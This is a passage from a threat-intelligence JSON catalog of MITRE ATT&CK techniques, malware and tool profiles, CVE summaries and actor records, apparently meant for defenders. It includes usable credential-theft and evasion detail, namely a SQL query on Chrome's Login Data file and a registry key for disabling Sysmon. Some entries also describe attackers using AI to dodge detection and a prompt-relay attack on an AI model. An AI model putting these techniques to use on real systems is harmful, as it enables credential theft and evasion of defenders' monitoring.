"7ab542a7-c8c6-11eb-9d72-02d538d9640e", "category": "mitre-attack-pattern", "description": "Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\n\nService or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices.\n\nAn adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. \n\nCloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods. For example, in Azure environments, adversaries may target Azure Managed Identities, which allow associated Azure resources to request access tokens. By compromising a resource with an attached Managed Identity, such as an Azure VM, adversaries may be able to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s to move laterally across the cloud environment.(Citation: SpecterOps Managed Identity 2022)", "created_on": "2021-06-09T02:00:35.000Z", "name": "Cloud Accounts"}, {"id": "5dc524b9-6c15-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\n\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket\u2019s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)\n\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.", "created_on": "2021-02-11T03:00:58.000Z", "name": "Cloud Infrastructure Discovery"}, {"id": "5db9dbd9-6c15-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\n\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)\n\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)\n\nThe de facto standard across cloud service providers is to host the Instance Metadata API at <code>http[:]//169.254.169.254</code>.\n", "created_on": "2021-02-11T03:00:58.000Z", "name": "Cloud Instance Metadata API"}, {"id": "9c2c9e43-65c5-444f-817e-053c9267e1ba", "category": "trellix-tool", "description": "Cloudflare Workers is a serverless platform that allows developers to run JavaScript, TypeScript, Python, or other supported code directly on Cloudflare's global network. Instead of relying on a centralized server, Workers execute applications at the edge, closer to end-users, improving performance, reducing latency, and enhancing scalability.", "created_on": "2024-12-19T22:14:31.000Z", "name": "Cloudflare Workers"}, {"id": "625f8206-75ba-427d-b387-5a893eb01385", "category": "trellix-tool", "description": "CloudSyncSvc is a Windows malware component of the GTG-20006 toolkit whose name suggests it masqueraded as a legitimate cloud-synchronization service, a common technique for blending persistence and data movement into normal-looking host activity. It was among the implants the actor kept operational by using AI to monitor their detection status and to systematically identify, modify, and redeploy any artifact that security tooling flagged. It was deployed as part of on-premises intrusions supporting the actor's broader credential-theft and data-exfiltration operations.", "created_on": "2026-09-12T00:12:32.000Z", "name": "CloudSyncSvc"}, {"id": "875552c1-98fb-406c-b4dc-72331d9085b0", "category": "mitre-attack-pattern", "description": "Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.  \n\nAdversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.(Citation: GitHub Cloud Service Credentials) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). \n\n**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1213/003), which focuses on [Collection](https://attack.mitre.org/tactics/TA0009) from private and internally hosted code repositories. ", "created_on": "2023-10-30T21:14:43.000Z", "name": "Code Repositories"}, {"id": "9c896739-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.\n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011)  ", "created_on": "2020-11-20T03:00:57.000Z", "name": "Compromise Software Supply Chain"}, {"id": "8d1f9466-7434-4d2b-bf1d-9bb1fd239fbb", "category": "trellix-tool", "description": "CornFlake RAT is a Go-based Windows remote-access trojan and info stealer,that is deployed via a dropper showing a fake progress window, it installs as %APPDATA%\\svchost32\\svchost32.exe and establishes redundant persistence (service, Run key, scheduled task, watchdog), reading configuration from sync.dat. It communicates over ECDH P-256/SHA-256 encrypted custom-JSON C2 and exposes a localhost HTTP API (/upload, /reload, /status) for modular tasking. Capabilities include browser credential/cookie theft, keylogging, clipboard and screenshot capture, audio/video recording, file and removable-media collection, host discovery, and remote shell execution.", "created_on": "2026-08-04T00:11:56.000Z", "name": "CornFlake RAT"}, {"id": "2a2c7d3e-3575-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, <code>AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data</code> and executing a SQL query: <code>SELECT action_url, username_value, password_value FROM logins;</code>. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function <code>CryptUnprotectData</code>, which uses the victim\u2019s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).", "created_on": "2020-12-03T14:38:09.000Z", "name": "Credentials from Web Browsers"}, {"id": "33105d0b-4594-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).(Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.(Citation: SRD GPP)\n\nIn cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)", "created_on": "2020-12-24T03:00:37.000Z", "name": "Credentials In Files"}, {"id": "e9dfab69-aa6f-47e0-9629-9951734bf68e", "category": "trellix-tool", "description": "Cscript starts a script to run in a command-line environment.\r\n\r\nSource: Microsoft", "created_on": "2021-10-06T13:08:53.000Z", "name": "Cscript"}, {"id": "516bd65c-cca7-4777-ad7d-b29be88dd809", "category": "trellix-tool", "description": "Curl is a command-line tool for transferring data specified with URL syntax.\r\nSource: https://github.com/curl/curl", "created_on": "2021-10-27T15:57:11.000Z", "name": "curl"}, {"id": "60d60d54-7b75-4f8a-a4dc-f4af59dd7e89", "category": "trellix-cve-database", "description": "An issue was discovered in mod_alias_physical_handler in mod_alias.c in lighttpd before 1.4.50. There is potential ../ path traversal of a single directory above an alias target, with a specific mod_alias configuration where the matched alias lacks a trailing '/' character, but the alias target filesystem path does have a trailing '/' character.", "created_on": "2026-09-12T00:12:34.000Z", "name": "CVE-2018-19052"}, {"id": "42aa5267-49f3-4288-8bbb-7d63d88b4f7a", "category": "trellix-cve-database", "description": "lighttpd before 1.4.54 has a signed integer overflow, which might allow remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a malicious HTTP GET request, as demonstrated by mishandling of /%2F? in burl_normalize_2F_to_slash_fix in burl.c. NOTE: The developer states \"The feature which can be abused to cause the crash is a new feature in lighttpd 1.4.50, and is not enabled by default. It must be explicitly configured in the config file (e.g. lighttpd.conf). Certain input will trigger an abort() in lighttpd when that feature is enabled. lighttpd detects the underflow or realloc() will fail (in both 32-bit and 64-bit executables), also detected in lighttpd. Either triggers an explicit abort() by lighttpd. This is not exploitable beyond triggering the explicit abort() with subsequent application exit.", "created_on": "2026-09-12T00:12:34.000Z", "name": "CVE-2019-11072"}, {"id": "8bacb3b3-c9f6-45d8-9053-5c36fe66f2e2", "category": "trellix-cve-database", "description": "In lighttpd 1.4.46 through 1.4.63, the mod_extforward_Forwarded function of the mod_extforward plugin has a stack-based buffer overflow (4 bytes representing -1), as demonstrated by remote denial of service (daemon crash) in a non-default configuration. The non-default configuration requires handling of the Forwarded header in a somewhat unusual manner. Also, a 32-bit system is much more likely to be affected than a 64-bit system.", "created_on": "2026-09-12T00:12:34.000Z", "name": "CVE-2022-22707"}, {"id": "1844a94c-595c-410a-afac-811f00bf978d", "category": "trellix-cve-database", "description": "A vulnerability in the handling of encrypted wireless frames of Cisco Aironet Access Point (AP) Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on the affected device.\r\n\r This vulnerability is due to incomplete cleanup of resources when dropping certain malformed frames. An attacker could exploit this vulnerability by connecting as a wireless client to an affected AP and sending specific malformed frames over the wireless connection. A successful exploit could allow the attacker to cause degradation of service to other clients, which could potentially lead to a complete DoS condition.", "created_on": "2026-09-12T00:12:34.000Z", "name": "CVE-2024-20354"}, {"id": "27f29fd8-aef5-42b0-8e86-3b4206446e77", "category": "trellix-cve-database", "description": "A vulnerability in the web-based management interface of Cisco Unified Industrial Wireless Software for Cisco Ultra-Reliable Wireless Backhaul (URWB) Access Points could allow an unauthenticated, remote attacker to perform command injection attacks with root privileges on the underlying operating system.\r\n\r\nThis vulnerability is due to improper validation of input to the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the underlying operating system of the affected device.", "created_on": "2026-09-12T00:12:34.000Z", "name": "CVE-2024-20418"}, {"id": "4e5c8cb0-47f4-46cc-ad44-09545faa2dca", "category": "trellix-cve-database", "description": "A misconfiguration in lmadmin.exe of FlexNet Publisher versions prior to\u00a02024 R1 (11.19.6.0) allows the OpenSSL configuration file to load from a non-existent directory. An unauthorized, locally authenticated user with low privileges can potentially create the directory and load a specially crafted openssl.conf file leading to the execution of a malicious DLL (Dynamic-Link Library) with elevated privileges.", "created_on": "2026-09-12T00:12:34.000Z", "name": "CVE-2024-2658"}, {"id": "f65d1dc3-5729-4a8c-b757-32b2b704b0e6", "category": "trellix-cve-database", "description": "CVE-2025-20309 is a critical vulnerability found in Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME), specifically affecting Engineering Special (ES) releases 15.0.1.13010-1 through 15.0.1.13017-1. This vulnerability, categorized as CWE-798 (Use of Hard-coded Credentials), stems from static, hard-coded root account credentials intended for development purposes but present in these specific production releases. \r\n\r\nThese credentials cannot be changed or deleted by the system administrator. An unauthenticated, remote attacker can exploit this vulnerability by leveraging these static root credentials to log in to an affected device via SSH. Successful exploitation grants the attacker root privileges, allowing them to execute arbitrary commands on the compromised system. \r\nThis provides complete control over the Unified CM or Unified CM SME device, enabling unauthorized configuration changes, data manipulation, or even the deployment of further malicious payloads. Cisco has identified and released software updates to address this vulnerability, and there are no known workarounds. \r\n\r\nAs of the current information, Cisco PSIRT is unaware of any public announcements or malicious use of this vulnerability in the wild, having discovered it during internal security testing. However, the potential impact of this vulnerability is severe, as it could lead to a complete compromise of critical communication infrastructure.", "created_on": "2026-09-12T00:12:34.000Z", "name": "CVE-2025-20309"}, {"id": "41a58386-acfc-4ddc-b6c9-08a5ec039e6f", "category": "trellix-tool", "description": "DarkSword is a commercial, JavaScript-based iOS full-chain exploit kit targeting iOS 18.4\u201318.7. It leverages six vulnerabilities across JavaScriptCore, dyld, ANGLE, and the XNU kernel to achieve RCE, sandbox escape (WebContent> GPU> mediaplaybackd), kernel privilege escalation, and final-stage payload execution without requiring PPL/SPTM bypasses. Delivered via watering holes and lure websites, it enables full device compromise with kernel-level privileges.", "created_on": "2026-03-20T00:17:46.000Z", "name": "DarkSword"}, {"id": "247b2cd6-842a-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\n\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).\n\nIn cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider) Similarly, they may delete virtual machines from on-prem virtualized environments.", "created_on": "2020-04-21T23:45:12.000Z", "name": "Data Destruction"}, {"id": "c92b1afd-b232-11ea-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may access data from cloud storage.\n\nMany IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform. \n\nIn some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the [Cloud API](https://attack.mitre.org/techniques/T1059/009). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., [Data from Information Repositories](https://attack.mitre.org/techniques/T1213)). \n\nAdversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.\n\nThis open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021)\n\nAdversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.", "created_on": "2020-06-19T13:42:58.000Z", "name": "Data from Cloud Storage"}, {"id": "a59a9c8e-fd1d-487a-a57d-28b3d93229b9", "category": "trellix-threat-actor", "description": "DeepSeek is an artificial intelligence research firm based in Hangzhou that specializes in frontier open-weight models and resource-efficient architectures. Founded by Liang Wenfeng and funded by the quantitative hedge fund High-Flyer, the enterprise significantly impacted the global technology market by producing low-cost, high-performance models. The company surreptitiously relayed millions of incoming customer prompts from various coding platforms to Claude, leveraging a cross-session replay attack across a two-week period in July 2026 to capture complex reasoning patterns for its own training datasets.", "created_on": "2026-09-14T16:11:58.000Z", "name": "DeepSeek"}, {"id": "91c3db4b-6913-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-18T12:25:35.000Z", "name": "Defense"}, {"id": "62b7f674-2a1c-47ee-a3ac-2fec21c763ce", "category": "country", "description": "Democratic Republic of the Congo", "created_on": "2026-02-07T00:16:46.000Z", "name": "democratic republic of the congo"}, {"id": "fcfb7085-99c8-4a0b-ac65-8b399fbca81f", "category": "trellix-tool", "description": "deSEC is a free, security-focused DNS hosting provider whose dedyn.io domain offers dynamic DNS records controllable through an API token. In the GTG-50029 hacktivist campaign it was used to host a BeEF browser-command-and-control endpoint at a dedyn.io subdomain held under an actor-controlled API token, letting the operator front their browser-exploitation infrastructure with a reputable free DNS service.", "created_on": "2026-09-12T00:12:33.000Z", "name": "deSEC"}, {"id": "7bef2955-27a2-42aa-ad1b-1a5b40433574", "category": "mitre-attack-pattern", "description": "Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.\n\nMFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user\u2019s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly, an adversary with existing access to a network may register a device or a virtual machine to Entra ID and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537)(Citation: Expel Atlas Lion 2025)\n\nDevices registered in Entra ID may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Entra ID tenant by registering a large number of devices.(Citation: AADInternals - BPRT)", "created_on": "2022-08-11T13:17:16.000Z", "name": "Device Registration"}, {"id": "3e152297-964d-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-15T01:41:48.000Z", "name": "Diplomacy"}, {"id": "eafe3771-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may trigger a denial-of-service attack via legitimate system processes. It has been previously observed that the Windows Time Travel Debugging (TTD) monitor driver can be used to initiate a debugging session for a security tool (e.g., an EDR) and render the tool non-functional.  By hooking the debugger into the EDR process, all child processes from the EDR will be automatically suspended. The attacker can terminate any EDR helper processes (unprotected by Windows Protected Process Light) by abusing the Process Explorer driver. In combination this will halt any attempt to restart services and cause the tool to crash.(Citation: Cocomazzi FIN7 Reboot)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) For example, adversaries may abuse the Windows process mitigation policy to block certain endpoint detection and response (EDR) products from loading their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON attribute using API calls like UpdateProcThreadAttribute, adversaries may evade detection by endpoint security solutions that rely on DLLs that are not signed by Microsoft. Alternatively, they may add new directories to an EDR tool\u2019s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)\n\nAdversaries may also focus on specific applications such as Sysmon. For example, the \u201cStart\u201d and \u201cEnable\u201d values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)", "created_on": "2020-11-20T22:08:28.000Z", "name": "Disable or Modify Tools"}, {"id": "defac2e0-2293-412b-b75c-1199d2dc4eb1", "category": "mitre-attack-pattern", "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)", "created_on": "2021-07-30T13:00:38.000Z", "name": "Disk Content Wipe"}, {"id": "217648f4-1168-483c-aaf5-99881d280f1b", "category": "mitre-attack-pattern", "description": "Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.\n\nBy compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Alternatively, they may be able to prove ownership of a domain to a SaaS service in order to assert control of the service or create a new administrative [Cloud Account](https://attack.mitre.org/techniques/T1136/003).(Citation: CyberCX SaaS Domain Hijacking 2025) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)", "created_on": "2023-05-08T21:16:38.000Z", "name": "DNS Server"}, {"id": "7832dd67-ae89-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute \"IDN homograph attacks,\" creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: 